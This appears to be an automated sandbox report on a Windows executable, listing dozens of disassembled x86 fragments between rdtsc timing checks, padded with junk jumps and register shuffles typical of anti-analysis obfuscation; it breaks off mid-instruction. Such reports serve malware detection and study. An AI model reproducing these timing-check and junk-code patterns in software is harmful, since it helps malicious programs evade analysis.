Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD01E0 second address: 6DD01F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, D1A9h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov al, dh 0x00000010 mov eax, 57477719h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD01F6 second address: 6DD0278 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 69DCD178h 0x00000008 jmp 00007F7B99161521h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007F7B99161521h 0x00000016 xchg eax, esi 0x00000017 pushad 0x00000018 mov bx, ax 0x0000001b pushfd 0x0000001c jmp 00007F7B99161528h 0x00000021 and si, B638h 0x00000026 jmp 00007F7B9916151Bh 0x0000002b popfd 0x0000002c popad 0x0000002d mov esi, dword ptr [762C06ECh] 0x00000033 pushad 0x00000034 mov cl, B8h 0x00000036 push edi 0x00000037 push eax 0x00000038 pop ebx 0x00000039 pop eax 0x0000003a popad 0x0000003b test esi, esi 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F7B99161522h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0278 second address: 6DD02AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F7B98E5574Fh 0x00000010 pushad 0x00000011 mov bl, 0Dh 0x00000013 mov edi, ecx 0x00000015 popad 0x00000016 xchg eax, edi 0x00000017 jmp 00007F7B98E5482Ah 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7B98E5482Eh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD03CA second address: 6DD03E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161522h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov bh, 7Eh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD03E9 second address: 6DD040E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54835h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dh, CBh 0x00000010 mov cx, 170Bh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD04B9 second address: 6DD04F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a sub eax, eax 0x0000000c jmp 00007F7B9916151Fh 0x00000011 mov dword ptr [esi], edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007F7B9916151Bh 0x0000001b pop esi 0x0000001c mov edx, 46D2F43Ch 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD04F1 second address: 6DD04F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD04F7 second address: 6DD04FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD04FB second address: 6DD0596 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E5482Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e pushad 0x0000000f movzx eax, di 0x00000012 popad 0x00000013 mov dword ptr [esi+08h], eax 0x00000016 jmp 00007F7B98E54835h 0x0000001b mov dword ptr [esi+0Ch], eax 0x0000001e pushad 0x0000001f pushad 0x00000020 call 00007F7B98E5482Ah 0x00000025 pop esi 0x00000026 pushfd 0x00000027 jmp 00007F7B98E5482Bh 0x0000002c adc esi, 501EAF7Eh 0x00000032 jmp 00007F7B98E54839h 0x00000037 popfd 0x00000038 popad 0x00000039 pushfd 0x0000003a jmp 00007F7B98E54830h 0x0000003f or cx, 0A78h 0x00000044 jmp 00007F7B98E5482Bh 0x00000049 popfd 0x0000004a popad 0x0000004b mov eax, dword ptr [ebx+4Ch] 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 movzx ecx, dx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0596 second address: 6DD0652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, bx 0x00000007 popad 0x00000008 mov dword ptr [esi+10h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F7B9916151Bh 0x00000012 or ah, FFFFFFEEh 0x00000015 jmp 00007F7B99161529h 0x0000001a popfd 0x0000001b jmp 00007F7B99161520h 0x00000020 popad 0x00000021 mov eax, dword ptr [ebx+50h] 0x00000024 pushad 0x00000025 push eax 0x00000026 mov ah, bl 0x00000028 pop esi 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F7B99161525h 0x00000030 jmp 00007F7B9916151Bh 0x00000035 popfd 0x00000036 pushad 0x00000037 popad 0x00000038 popad 0x00000039 popad 0x0000003a mov dword ptr [esi+14h], eax 0x0000003d jmp 00007F7B99161524h 0x00000042 mov eax, dword ptr [ebx+54h] 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007F7B9916151Eh 0x0000004c or si, 6E58h 0x00000051 jmp 00007F7B9916151Bh 0x00000056 popfd 0x00000057 pushad 0x00000058 mov cl, 21h 0x0000005a popad 0x0000005b popad 0x0000005c mov dword ptr [esi+18h], eax 0x0000005f pushad 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0652 second address: 6DD0682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dx, cx 0x00000008 popad 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c jmp 00007F7B98E5482Eh 0x00000011 mov dword ptr [esi+1Ch], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F7B98E5482Dh 0x0000001c mov edi, ecx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0682 second address: 6DD06DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+5Ch] 0x0000000c pushad 0x0000000d mov dh, al 0x0000000f pushfd 0x00000010 jmp 00007F7B99161529h 0x00000015 xor ch, 00000066h 0x00000018 jmp 00007F7B99161521h 0x0000001d popfd 0x0000001e popad 0x0000001f mov dword ptr [esi+20h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F7B9916151Dh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD06DB second address: 6DD0723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+60h] 0x0000000c pushad 0x0000000d mov si, bx 0x00000010 popad 0x00000011 mov dword ptr [esi+24h], eax 0x00000014 pushad 0x00000015 call 00007F7B98E5482Bh 0x0000001a mov si, 635Fh 0x0000001e pop esi 0x0000001f call 00007F7B98E54835h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0723 second address: 6DD07E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [ebx+64h] 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7B99161523h 0x00000010 adc si, E20Eh 0x00000015 jmp 00007F7B99161529h 0x0000001a popfd 0x0000001b push esi 0x0000001c mov dx, 5322h 0x00000020 pop ebx 0x00000021 popad 0x00000022 mov dword ptr [esi+28h], eax 0x00000025 pushad 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F7B99161522h 0x0000002d xor al, FFFFFFB8h 0x00000030 jmp 00007F7B9916151Bh 0x00000035 popfd 0x00000036 mov bl, cl 0x00000038 popad 0x00000039 mov dl, D2h 0x0000003b popad 0x0000003c mov eax, dword ptr [ebx+68h] 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F7B9916151Ah 0x00000046 add si, C618h 0x0000004b jmp 00007F7B9916151Bh 0x00000050 popfd 0x00000051 pushfd 0x00000052 jmp 00007F7B99161528h 0x00000057 xor cx, 3078h 0x0000005c jmp 00007F7B9916151Bh 0x00000061 popfd 0x00000062 popad 0x00000063 mov dword ptr [esi+2Ch], eax 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD07E8 second address: 6DD07EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD07EC second address: 6DD07F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD07F0 second address: 6DD07F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD07F6 second address: 6DD0878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+6Ch] 0x0000000d jmp 00007F7B99161520h 0x00000012 mov word ptr [esi+30h], ax 0x00000016 pushad 0x00000017 movzx esi, bx 0x0000001a pushfd 0x0000001b jmp 00007F7B99161523h 0x00000020 jmp 00007F7B99161523h 0x00000025 popfd 0x00000026 popad 0x00000027 mov ax, word ptr [ebx+00000088h] 0x0000002e jmp 00007F7B99161526h 0x00000033 mov word ptr [esi+32h], ax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F7B9916151Ah 0x00000040 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0878 second address: 6DD0887 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E5482Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0887 second address: 6DD089F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B99161524h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD089F second address: 6DD08A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD08A3 second address: 6DD0915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+0000008Ch] 0x0000000e jmp 00007F7B99161527h 0x00000013 mov dword ptr [esi+34h], eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F7B99161524h 0x0000001d add ecx, 0AD6A5E8h 0x00000023 jmp 00007F7B9916151Bh 0x00000028 popfd 0x00000029 jmp 00007F7B99161528h 0x0000002e popad 0x0000002f mov eax, dword ptr [ebx+18h] 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0915 second address: 6DD0919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0919 second address: 6DD091F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD091F second address: 6DD09C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 mov ecx, 01396A8Dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esi+38h], eax 0x00000011 jmp 00007F7B98E54838h 0x00000016 mov eax, dword ptr [ebx+1Ch] 0x00000019 jmp 00007F7B98E54830h 0x0000001e mov dword ptr [esi+3Ch], eax 0x00000021 pushad 0x00000022 call 00007F7B98E5482Eh 0x00000027 jmp 00007F7B98E54832h 0x0000002c pop ecx 0x0000002d call 00007F7B98E5482Bh 0x00000032 jmp 00007F7B98E54838h 0x00000037 pop ecx 0x00000038 popad 0x00000039 mov eax, dword ptr [ebx+20h] 0x0000003c pushad 0x0000003d call 00007F7B98E54837h 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD09C2 second address: 6DD09CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 movsx ebx, si 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD09CC second address: 6DD0A0C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7B98E5482Eh 0x00000008 sub esi, 494D2758h 0x0000000e jmp 00007F7B98E5482Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [esi+40h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F7B98E54835h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0A0C second address: 6DD0A12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0A12 second address: 6DD0A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0A16 second address: 6DD0A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7B99161522h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0A38 second address: 6DD0A5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, B1h 0x00000005 mov cx, 12A9h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push 00000001h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F7B98E54831h 0x00000016 pop esi 0x00000017 mov ah, bl 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0A5E second address: 6DD0ADC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7B99161529h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F7B99161521h 0x0000000f xor ecx, 35BDA9C6h 0x00000015 jmp 00007F7B99161521h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e nop 0x0000001f jmp 00007F7B9916151Eh 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F7B9916151Ch 0x0000002e sbb ax, B598h 0x00000033 jmp 00007F7B9916151Bh 0x00000038 popfd 0x00000039 mov ah, 4Fh 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0ADC second address: 6DD0AF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B98E54831h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0AF1 second address: 6DD0B19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F7B9916151Dh 0x0000000e lea eax, dword ptr [ebp-10h] 0x00000011 pushad 0x00000012 call 00007F7B9916151Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0B19 second address: 6DD0B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 jmp 00007F7B98E5482Ah 0x0000000c push eax 0x0000000d jmp 00007F7B98E5482Bh 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7B98E54835h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0BAA second address: 6DD0BD9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7B99161522h 0x00000008 xor cl, 00000008h 0x0000000b jmp 00007F7B9916151Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 test edi, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0BD9 second address: 6DD0BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0BDD second address: 6DD0BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0BE3 second address: 6DD0C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B98E54839h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0C00 second address: 6DD0C28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F7C085CFFC2h 0x00000011 pushad 0x00000012 push eax 0x00000013 mov ebx, 55D9115Eh 0x00000018 pop ebx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0C28 second address: 6DD0C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, dx 0x00000007 popad 0x00000008 popad 0x00000009 mov eax, dword ptr [ebp-0Ch] 0x0000000c pushad 0x0000000d push edx 0x0000000e mov bx, si 0x00000011 pop esi 0x00000012 movsx ebx, ax 0x00000015 popad 0x00000016 mov dword ptr [esi+04h], eax 0x00000019 pushad 0x0000001a mov cx, 4435h 0x0000001e call 00007F7B98E54832h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0C5A second address: 6DD0C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 lea eax, dword ptr [ebx+78h] 0x00000009 jmp 00007F7B99161527h 0x0000000e push 00000001h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0C82 second address: 6DD0C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0C86 second address: 6DD0C8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0C8C second address: 6DD0CA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B98E54839h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0CA9 second address: 6DD0CD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F7B9916151Eh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov esi, 338D9D43h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0D84 second address: 6DD0D8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0D8A second address: 6DD0D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0D8E second address: 6DD0D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0D92 second address: 6DD0DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0DA2 second address: 6DD0DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0DA6 second address: 6DD0DBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0DBF second address: 6DD0E03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007F7B98E5482Eh 0x00000010 js 00007F7C082C30FBh 0x00000016 jmp 00007F7B98E54830h 0x0000001b mov eax, dword ptr [ebp-04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov al, bl 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0E03 second address: 6DD0EFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c jmp 00007F7B99161526h 0x00000011 lea eax, dword ptr [ebx+70h] 0x00000014 jmp 00007F7B99161520h 0x00000019 push 00000001h 0x0000001b pushad 0x0000001c movzx esi, di 0x0000001f mov ebx, 4C3791FEh 0x00000024 popad 0x00000025 push edx 0x00000026 jmp 00007F7B99161522h 0x0000002b mov dword ptr [esp], eax 0x0000002e jmp 00007F7B99161520h 0x00000033 lea eax, dword ptr [ebp-18h] 0x00000036 pushad 0x00000037 pushad 0x00000038 call 00007F7B9916151Ch 0x0000003d pop esi 0x0000003e mov al, dh 0x00000040 popad 0x00000041 pushfd 0x00000042 jmp 00007F7B9916151Ch 0x00000047 and si, 7358h 0x0000004c jmp 00007F7B9916151Bh 0x00000051 popfd 0x00000052 popad 0x00000053 nop 0x00000054 jmp 00007F7B99161526h 0x00000059 push eax 0x0000005a pushad 0x0000005b call 00007F7B99161521h 0x00000060 mov bx, ax 0x00000063 pop ecx 0x00000064 push edi 0x00000065 jmp 00007F7B99161528h 0x0000006a pop eax 0x0000006b popad 0x0000006c nop 0x0000006d push eax 0x0000006e push edx 0x0000006f pushad 0x00000070 call 00007F7B9916151Ah 0x00000075 pop eax 0x00000076 mov ch, dh 0x00000078 popad 0x00000079 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0F5B second address: 6DD0F7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, bx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0F7A second address: 6DD0F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0F7F second address: 6DD0FFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7B98E54830h 0x00000009 xor ecx, 32A62BF8h 0x0000000f jmp 00007F7B98E5482Bh 0x00000014 popfd 0x00000015 mov dx, cx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test edi, edi 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F7B98E54837h 0x00000024 add ecx, 55712C6Eh 0x0000002a jmp 00007F7B98E54839h 0x0000002f popfd 0x00000030 popad 0x00000031 js 00007F7C082C2EEEh 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F7B98E5482Dh 0x0000003e rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0FFC second address: 6DD10E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7B99161527h 0x00000008 pop eax 0x00000009 mov di, 245Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [ebp-14h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F7B99161521h 0x0000001a and esi, 653DB4B6h 0x00000020 jmp 00007F7B99161521h 0x00000025 popfd 0x00000026 mov ecx, 4C855AA7h 0x0000002b popad 0x0000002c mov ecx, esi 0x0000002e jmp 00007F7B9916151Ah 0x00000033 mov dword ptr [esi+0Ch], eax 0x00000036 pushad 0x00000037 mov bx, si 0x0000003a push eax 0x0000003b pushad 0x0000003c popad 0x0000003d pop edx 0x0000003e popad 0x0000003f mov edx, 762C06ECh 0x00000044 pushad 0x00000045 mov dx, si 0x00000048 mov si, D623h 0x0000004c popad 0x0000004d sub eax, eax 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007F7B99161525h 0x00000056 sbb ecx, 4E693A26h 0x0000005c jmp 00007F7B99161521h 0x00000061 popfd 0x00000062 pushfd 0x00000063 jmp 00007F7B99161520h 0x00000068 and al, 